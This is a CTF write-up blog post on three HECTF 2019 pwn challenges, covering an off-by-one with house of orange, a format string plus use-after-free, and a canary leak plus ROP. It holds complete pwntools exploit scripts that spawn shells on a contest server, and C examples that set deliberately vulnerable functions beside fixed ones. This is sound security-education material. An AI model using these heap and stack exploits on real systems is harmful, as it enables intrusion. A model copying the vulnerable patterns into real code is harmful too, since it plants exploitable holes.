Whali3n51's blog


HECTF_Pwn_wp

Whali3n51 发布于 2019-11-11

I did not really play this CTF, mainly because I had other things to do on the day of the contest. It is said to be a beginner-oriented event, organised by Hebei Normal University; I only solved a few of the challenges.

0x01 hard_pwn

There is a single off-by-one. It is enough to make heap chunks overlap, and from there house of orange gives a shell.

```python
from pwn import *

# Python 2 / pwntools script: payloads are str, not bytes
context.log_level = "debug"
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# menu wrappers: 1 = create, 2 = edit, 3 = free, 4 = show
def free(index):
    p.sendlineafter(': ', "3")
    p.sendlineafter(': ', str(index))

def create(size):
    p.sendlineafter(': ', "1")
    p.sendlineafter(': ', str(size))

def edit(index, size, content):
    p.sendlineafter(': ', "2")
    p.sendlineafter(': ', str(index))
    p.sendlineafter(": ", str(size))
    p.sendafter(':', content)

def show(index):
    p.sendlineafter(': ', "4")
    p.sendlineafter(': ', str(index))

#p = process("./hard_pwn")
p = remote("183.129.189.60", 10026)
create(0x90)  # 0
create(0xf8)  # 1
create(0x90)  # 2
create(0x90)  # 3
free(0)
# the over-long edit of chunk 1 rewrites chunk 2's prev_size/size, so freeing
# chunk 2 merges it backwards over chunks 0 and 1: the chunks now overlap
edit(1, 0x100, 0xf0*'a' + p64(0x1a0) + p64(0xa0))
free(2)
create(0x90)  # 0
show(1)       # chunk 1 lies inside a free chunk: leak the main_arena pointer
p.recvuntil("You play is ")
libc_base = u64(p.recv(6).ljust(8, '\x00')) - (0x00007ffff7dd1b78 - 0x7ffff7a0d000)
_IO_list_all = libc_base + libc.symbols['_IO_list_all']
success("libc_base=====>0x%x" % libc_base)
pause()
# house of orange: forged chunk header, then a forged _IO_FILE in chunk 1
fake_file = p64(0) + p64(0x61)
edit(0, 0xa0, 'a'*0x90 + fake_file)
fake_file = p64(0) + p64(_IO_list_all - 0x10)
fake_file += p64(1) + p64(2)
fake_file += p64(0) + p64(libc_base + 0x18cd57)
fake_file = fake_file.ljust(0xc8, "\x00")
fake_file += p64(libc_base + 0x3c37a0 - 8)
fake_file += p64(0)
fake_file += p64(libc_base + libc.symbols['system'])
edit(1, 0x100, fake_file)
#gdb.attach(p)
create(0xf8)  # 1: this malloc walks the corrupted unsorted bin
p.interactive()
```
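The bug the script above relies on, seen from the defender's side. This is an added example, not the challenge binary's code: it models two adjacent chunks in a flat byte array with glibc's layout (a constructed 0x18-byte data area behind an 8-byte size field) and contrasts an edit routine whose `<=` bounds check lets the string terminator land one byte past the buffer, on the neighbouring chunk's size field, with the check that keeps the terminator inside the buffer. The chunk sizes and the `edit_vuln`/`edit_fixed` names are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's code. A toy "heap" of two
 * adjacent chunks laid out as glibc lays them out: an 8-byte size field
 * followed by the user data. One byte written past chunk 0's data lands
 * on the lowest byte of chunk 1's size field, which is the root of the
 * overlap the writeup describes. */
#define DATA_SIZE  0x18                        /* constructed: usable bytes per chunk */
#define HDR_SIZE   8                           /* size field only; prev_size omitted */
#define CHUNK_SIZE (HDR_SIZE + DATA_SIZE)
#define SIZE_WORD  ((uint64_t)CHUNK_SIZE | 1)  /* 0x21: size | PREV_INUSE, as glibc stores it */

typedef struct { uint8_t mem[2 * CHUNK_SIZE]; } toy_heap;

static void heap_init(toy_heap *h) {
    uint64_t sz = SIZE_WORD;
    memset(h->mem, 0, sizeof h->mem);
    memcpy(h->mem, &sz, sizeof sz);               /* chunk 0 header */
    memcpy(h->mem + CHUNK_SIZE, &sz, sizeof sz);  /* chunk 1 header */
}

static uint8_t *chunk_data(toy_heap *h, int idx) {
    return h->mem + idx * CHUNK_SIZE + HDR_SIZE;
}

uint64_t chunk_size_word(const toy_heap *h, int idx) {
    uint64_t sz;
    memcpy(&sz, h->mem + idx * CHUNK_SIZE, sizeof sz);
    return sz;
}

/* Vulnerable edit: `len <= DATA_SIZE` lets len == DATA_SIZE through, and the
 * terminator then goes to data[DATA_SIZE], the first byte of the next header. */
int edit_vuln(toy_heap *h, int idx, const char *src, size_t len) {
    if (len > DATA_SIZE) return -1;
    uint8_t *d = chunk_data(h, idx);
    memcpy(d, src, len);
    d[len] = '\0';                 /* off by one when len == DATA_SIZE */
    return 0;
}

/* Fixed edit: the terminator has to fit inside the buffer, so the request is
 * refused once len reaches DATA_SIZE (alternatively allocate DATA_SIZE + 1). */
int edit_fixed(toy_heap *h, int idx, const char *src, size_t len) {
    if (len >= DATA_SIZE) return -1;
    uint8_t *d = chunk_data(h, idx);
    memcpy(d, src, len);
    d[len] = '\0';
    return 0;
}

/* Push exactly DATA_SIZE bytes into chunk 0 through the given edit routine
 * and report chunk 1's size word afterwards: SIZE_WORD means it survived,
 * 0 means the low byte was cleared by the stray terminator. */
uint64_t neighbour_size_after(int (*edit)(toy_heap *, int, const char *, size_t)) {
    toy_heap h;
    char input[DATA_SIZE];
    heap_init(&h);
    memset(input, 'A', sizeof input);  /* constructed input of exactly DATA_SIZE bytes */
    edit(&h, 0, input, sizeof input);
    return chunk_size_word(&h, 1);
}

int main(void) {
    printf("chunk 1 size word after vulnerable edit: 0x%llx\n",
           (unsigned long long)neighbour_size_after(edit_vuln));
    printf("chunk 1 size word after fixed edit:      0x%llx\n",
           (unsigned long long)neighbour_size_after(edit_fixed));
    return 0;
}
```

With the vulnerable routine chunk 1's size word drops from 0x21 to 0, so the allocator would later read a wrong size for that chunk; with the fixed routine the full-length request is refused and the header keeps its value. The same check belongs on any menu "edit" that takes a caller-supplied length.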

0x02 pwn_disco

Honestly, the art style of this one is quite funny; I laughed for a good while when running the program. It has two bugs, which make the challenge easy: a format string, which leaks the libc base directly, and a UAF, since a dangling pointer remains after a chunk is freed. That is enough to attack __malloc_hook directly and overwrite it with a one_gadget to get a shell.

```python
from pwn import *
p = remote("183.129.189.60", 10002)
#p = process('./pwn_disco')
context.log_level = "debug"
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create(index, content):
    p.sendlineafter('Your Choice:', "2")
    p.sendlineafter('Your Choice:', "1")
    p.sendlineafter('index:', str(index))
    p.sendafter('color:', content)

def edit(index, content):
    p.sendlineafter('Your Choice:', "2")
    p.sendlineafter('Your Choice:', "0")
    p.sendlineafter(":", str(index))
    p.sendafter('color:', content)

def free(index):
    p.sendlineafter('Your Choice:', "3")
    p.sendlineafter('index:', str(index))

# format string: the 15th argument slot holds a libc address
p.sendlineafter('Your Choice:', "1")
p.sendlineafter('draw:', "%15$p")
p.recvuntil('0x')
libc_base = int(p.recv(12), 16) - (0x7f7e0aafb830 - 0x7f7e0aadb000)
success("libc_base===>0x%x" % libc_base)
# UAF: slot 0 still points at the freed chunk, so edit() rewrites its fd
create(0, '11111')
free(0)
edit(0, p64(libc_base + libc.symbols['__malloc_hook'] - 0x23))
create(0, p64(libc_base + libc.symbols['__malloc_hook'] - 0x23))
onegad = [0x45216, 0x4526a, 0xf02a4, 0xf1147]  # one_gadget offsets for this libc
# the next allocation lands just below __malloc_hook; overwrite the hook
create(1, '\x00'*(0x13-0x8) + p64(libc_base + onegad[3]) + p64(libc_base + onegad[3]))
free(0)
# one more malloc call fires the hook
p.sendlineafter('Your Choice:', "2")
p.sendlineafter('Your Choice:', "1")
p.sendlineafter('index:', '0')

#gdb.attach(p)
p.interactive()
```
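The dangling-pointer half of this challenge, as an added example that is not the challenge's code. It puts a slot table (the kind of array a menu-driven program keeps its chunk pointers in) on top of a tiny first-fit allocator with a constructed four-chunk pool. The vulnerable `free` releases the chunk but leaves the slot pointing at it, so a later edit through that index writes into memory the allocator is about to hand to the next `create`; the fixed `free` clears the slot, which makes the existing NULL check in the handlers actually protect something, and allocation zeroes the chunk so the previous owner's data does not leak either. All names and sizes here are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's code: a slot table over a toy
 * first-fit allocator, with a vulnerable and a fixed free() side by side. */
#define NCHUNKS   4
#define CHUNK_LEN 0x20
#define NSLOTS    4

typedef struct {
    char  pool[NCHUNKS * CHUNK_LEN];   /* constructed backing memory */
    int   in_use[NCHUNKS];
    char *slots[NSLOTS];               /* the pointers the menu handlers use */
} toy_store;

static toy_store store;                /* state for the two flows below */

/* first-fit allocation; the fixed flow asks for zeroed memory */
static char *pool_alloc(toy_store *s, int zero) {
    for (int i = 0; i < NCHUNKS; i++) {
        if (s->in_use[i]) continue;
        s->in_use[i] = 1;
        char *p = s->pool + i * CHUNK_LEN;
        if (zero) memset(p, 0, CHUNK_LEN);
        return p;
    }
    return NULL;
}

/* data is left in place on free, as real allocators do */
static void pool_free(toy_store *s, char *p) {
    s->in_use[(p - s->pool) / CHUNK_LEN] = 0;
}

static void put(char *dst, const char *src) {
    strncpy(dst, src, CHUNK_LEN - 1);
    dst[CHUNK_LEN - 1] = '\0';
}

static int slot_ok(const toy_store *s, int idx) {
    return idx >= 0 && idx < NSLOTS && s->slots[idx] != NULL;
}

/* shared handlers: the NULL check only helps if free() clears the slot */
int do_create(toy_store *s, int idx, int zero) {
    if (idx < 0 || idx >= NSLOTS) return -1;
    s->slots[idx] = pool_alloc(s, zero);
    return s->slots[idx] ? 0 : -1;
}
int do_edit(toy_store *s, int idx, const char *content) {
    if (!slot_ok(s, idx)) return -1;
    put(s->slots[idx], content);
    return 0;
}

/* vulnerable free: releases the chunk, leaves the pointer dangling */
int free_vuln(toy_store *s, int idx) {
    if (!slot_ok(s, idx)) return -1;
    pool_free(s, s->slots[idx]);
    return 0;
}
/* fixed free: the slot is cleared, so later edits on it are rejected */
int free_fixed(toy_store *s, int idx) {
    if (!slot_ok(s, idx)) return -1;
    pool_free(s, s->slots[idx]);
    s->slots[idx] = NULL;
    return 0;
}

/* Vulnerable flow: the write through stale slot 0 ends up in the chunk
 * that slot 1 receives next. Returns what slot 1 reads. */
const char *next_owner_sees_vuln(void) {
    memset(&store, 0, sizeof store);
    do_create(&store, 0, 0);  do_edit(&store, 0, "secret");
    free_vuln(&store, 0);
    do_edit(&store, 0, "PWNED");         /* write-after-free, accepted */
    do_create(&store, 1, 0);             /* first-fit hands out the same chunk */
    return store.slots[1];
}

/* Fixed flow, same steps: the stale edit is refused (-1) ... */
int stale_edit_result_fixed(void) {
    memset(&store, 0, sizeof store);
    do_create(&store, 0, 1);  do_edit(&store, 0, "secret");
    free_fixed(&store, 0);
    return do_edit(&store, 0, "PWNED");  /* slot 0 no longer points anywhere */
}
/* ... and the next owner gets a zeroed chunk, neither "secret" nor "PWNED". */
const char *next_owner_sees_fixed(void) {
    stale_edit_result_fixed();
    do_create(&store, 1, 1);
    return store.slots[1];
}

int main(void) {
    printf("vulnerable: slot 1 reads \"%s\"\n", next_owner_sees_vuln());
    printf("fixed: stale edit returns %d, slot 1 reads \"%s\"\n",
           stale_edit_result_fixed(), next_owner_sees_fixed());
    return 0;
}
```

The two flows run the same menu sequence; only `free` differs. Clearing the pointer at free time is what turns the dangling index into a rejected request, and it is the first thing to look for when reviewing a program like this one.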

0x03 stackpwn2

This one really is a beginner challenge. Again there are two bugs: a format string, used to leak the canary, and then a stack overflow.

```python
from pwn import *
from LibcSearcher import *
p = process('./stackpwn2')
#p = remote('183.129.189.60', 10000)
p.recvuntil('checking the output system...\n')
pause()
# format string: the canary sits in the 9th argument slot
p.sendline('%9$p')
p.recvuntil('0x')
canary = int(p.recv(16), 16)
# stack overflow: buffer, leaked canary, saved rbp, then a ROP chain
# (pop rdi gadget, puts GOT entry, puts PLT stub, back into the program)
payload = 'a'*0x18 + p64(canary) + 'aaaaaaaa' + p64(0x00000000004009c3) + p64(0x000000000601018) + p64(0x0400650) + p64(0x0000000004008A2)
p.sendlineafter("What you want to do?\n", payload)
puts_addr = u64(p.recv(6).ljust(8, '\x00'))
obj = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - obj.dump('puts')
# second round: system("/bin/sh")
payload = 'a'*0x18 + p64(canary) + 'aaaaaaaa' + p64(0x00000000004009c3) + p64(libc_base + obj.dump("str_bin_sh")) + p64(libc_base + obj.dump('system')) + p64(0x0000000004008A2)
p.sendline(payload)
p.interactive()
```
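Both bugs of this challenge, and the format string that pwn_disco above shares with it, from the defender's side. This is an added example and not the challenge's code: a flat byte array stands in for the frame of a function with a 0x18-byte buffer (the layout the payload above assumes: buffer, canary, saved frame pointer, return address), with a constructed canary whose low byte is 0 as on x86-64 glibc. It shows that an unbounded copy reaches the canary and the return address, what the compiler-inserted canary check compares, how a length check tied to the buffer size stops the copy, and why user text has to be passed to `printf` as an argument rather than as the format. Offsets, the canary value and the function names are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's code: a toy stack frame with
 * the layout buffer | canary | saved rbp | return address. */
enum { BUF_LEN = 0x18, CANARY_OFF = 0x18, SAVED_RBP_OFF = 0x20, RET_OFF = 0x28, FRAME_LEN = 0x30 };

typedef struct { uint8_t bytes[FRAME_LEN]; } toy_frame;

/* constructed canary; the low byte is 0 as on x86-64 glibc, so string
 * functions stop before it and a %p-style leak is needed to read it */
static const uint64_t CANARY   = 0x1d2f3a4b5c6d7e00ULL;
static const uint64_t RET_ADDR = 0x401000ULL;          /* constructed return address */

static void frame_init(toy_frame *f) {
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + CANARY_OFF, &CANARY, 8);
    memcpy(f->bytes + RET_OFF, &RET_ADDR, 8);
}

static uint64_t frame_word(const toy_frame *f, int off) {
    uint64_t w;
    memcpy(&w, f->bytes + off, 8);
    return w;
}

/* The epilogue check: 1 = canary untouched, 0 = what __stack_chk_fail would see. */
int canary_check(const toy_frame *f) {
    return frame_word(f, CANARY_OFF) == CANARY;
}

/* Vulnerable read: copies whatever length arrives, as an unbounded read()
 * or gets() into the 0x18-byte buffer would. Clamped to the toy frame only
 * so that the example stays inside its own array. */
void read_input_vuln(toy_frame *f, const uint8_t *in, size_t len) {
    if (len > FRAME_LEN) len = FRAME_LEN;
    memcpy(f->bytes, in, len);
}

/* Fixed read: the buffer, not the input, sets the bound. */
int read_input_fixed(toy_frame *f, const uint8_t *in, size_t len) {
    if (len >= BUF_LEN) return -1;          /* leave room for the terminator */
    memcpy(f->bytes, in, len);
    f->bytes[len] = '\0';
    return 0;
}

/* Constructed oversized input shaped like the writeup's payload: filler up to
 * the canary slot, then 8 bytes over each of canary, saved rbp, return address. */
static void build_long_input(uint8_t out[FRAME_LEN]) {
    memset(out, 'A', BUF_LEN);
    memset(out + CANARY_OFF, 'C', 8);
    memset(out + SAVED_RBP_OFF, 'B', 8);
    memset(out + RET_OFF, 'R', 8);
}

int canary_survives_vuln(void) {
    toy_frame f; uint8_t in[FRAME_LEN];
    frame_init(&f); build_long_input(in);
    read_input_vuln(&f, in, sizeof in);
    return canary_check(&f);                /* 0: the check would abort here */
}
uint64_t ret_after_vuln(void) {
    toy_frame f; uint8_t in[FRAME_LEN];
    frame_init(&f); build_long_input(in);
    read_input_vuln(&f, in, sizeof in);
    return frame_word(&f, RET_OFF);         /* 'R' bytes replaced the return address */
}
int fixed_rejects_long_input(void) {
    toy_frame f; uint8_t in[FRAME_LEN];
    frame_init(&f); build_long_input(in);
    return read_input_fixed(&f, in, sizeof in);   /* -1 */
}
int canary_survives_fixed(void) {
    toy_frame f; uint8_t in[FRAME_LEN];
    frame_init(&f); build_long_input(in);
    read_input_fixed(&f, in, sizeof in);
    return canary_check(&f);                /* 1 */
}

/* Vulnerable pattern, deliberately not compiled here: printf(user). With the
 * user text as the format, "%9$p" makes printf fetch the ninth argument
 * position, which is a stack slot. Fixed: the text is an argument, so its
 * '%' characters are plain data. */
int render_fixed(char *out, size_t outlen, const char *user) {
    return snprintf(out, outlen, "%s", user);
}
int format_directives_inert(void) {
    char out[32];
    render_fixed(out, sizeof out, "%9$p");
    return strcmp(out, "%9$p") == 0;        /* 1: nothing was dereferenced */
}

int main(void) {
    printf("vulnerable copy: canary ok=%d, return address=0x%llx\n",
           canary_survives_vuln(), (unsigned long long)ret_after_vuln());
    printf("fixed copy: rc=%d, canary ok=%d\n", fixed_rejects_long_input(), canary_survives_fixed());
    printf("\"%%9$p\" as an argument prints literally: %d\n", format_directives_inert());
    return 0;
}
```

The two halves reinforce each other: the canary check in the epilogue only catches the overflow as long as the attacker cannot read the canary first, which is exactly what the format string removes. Compiling with `-Wformat-security` flags the `printf(user)` pattern, and a length check tied to the buffer closes the overflow regardless of the canary.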
  • #UAF
  • #house of orange
© 2022 Whali3n51